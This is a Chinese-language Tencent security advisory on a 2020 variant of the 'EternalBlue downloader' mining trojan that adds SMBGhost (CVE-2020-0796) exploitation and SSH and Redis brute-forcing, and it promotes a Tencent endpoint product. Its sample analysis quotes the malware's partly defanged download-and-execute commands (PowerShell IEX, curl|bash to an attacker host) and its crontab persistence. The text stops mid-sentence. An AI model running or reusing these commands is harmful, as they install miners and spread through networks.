“黑球”行动再升级,SMBGhost漏洞攻击进入实战

2020-06-12 来源:原创 作者:腾讯电脑管家
【文章摘要】2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种,首次启用SMBGhost漏洞攻击。永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。中小微企业用户可使用腾讯电脑管家小团队版对永恒之蓝木马下载器相关病毒木马进行检测查杀,并实时检测团队设备运行状况。

一、背景

2020610日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。

此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。

腾讯安全系列安全产品已支持该病毒的检测和清除腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。


二、解决方案

永恒之蓝木马下载器利用多种流行的攻击方式,包括高危漏洞利用、爆破攻击、感染可移动设备、钓鱼邮件攻击,对企业用户危害严重。SMBGhost漏洞利用会导致完全控制企业服务器,可能造成严重信息泄露事件。中小微企业用户可使用腾讯电脑管家小团队版https://team.qq.com/site/index.html,对永恒之蓝木马下载器相关病毒木马进行检测查杀,并实时检测团队设备运行状况。

腾讯电脑管家小团队版面向中小微企业,功能丰富且永久免费。企业只需注册并下载客户端,即可免费享受专业的终端安全管理服务,有效满足中小企业安全运维降本增效的诉求。

管理后台的首页概览可帮助管理员了解当前团队的总体设备安全状态、预警情况、资产管理,同时还展示了团队的网络资源使用情况和公告投放的进度。预警卡片将为管理员展示当前团队中有异常的设备数,预警的内容包括设备安全状态的预警、设备运行健康度的预警和硬件变更类的预警,实时检测团队设备安全。

团队成员均可使用电脑管家客户端进行病毒查杀、垃圾清理、电脑加速、软件管理等功能操作,及时修复电脑漏洞,实时保障设备安全性,改善运行体验。


三、样本分析

攻击模块if.binsmbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:

powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'')

发起针对Linux服务器的攻击:

1、 利用SSH爆破

扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破登陆成功后执行远程命令:

Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash

2、 利用Redis未授权访问漏洞

扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash

SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:

1、 创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp

2、 创建crontab定时启动Linux平台挖矿木马/.Xll/xr

通过定时任务执行的a.asp首先会清除竞品挖矿木马,然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击: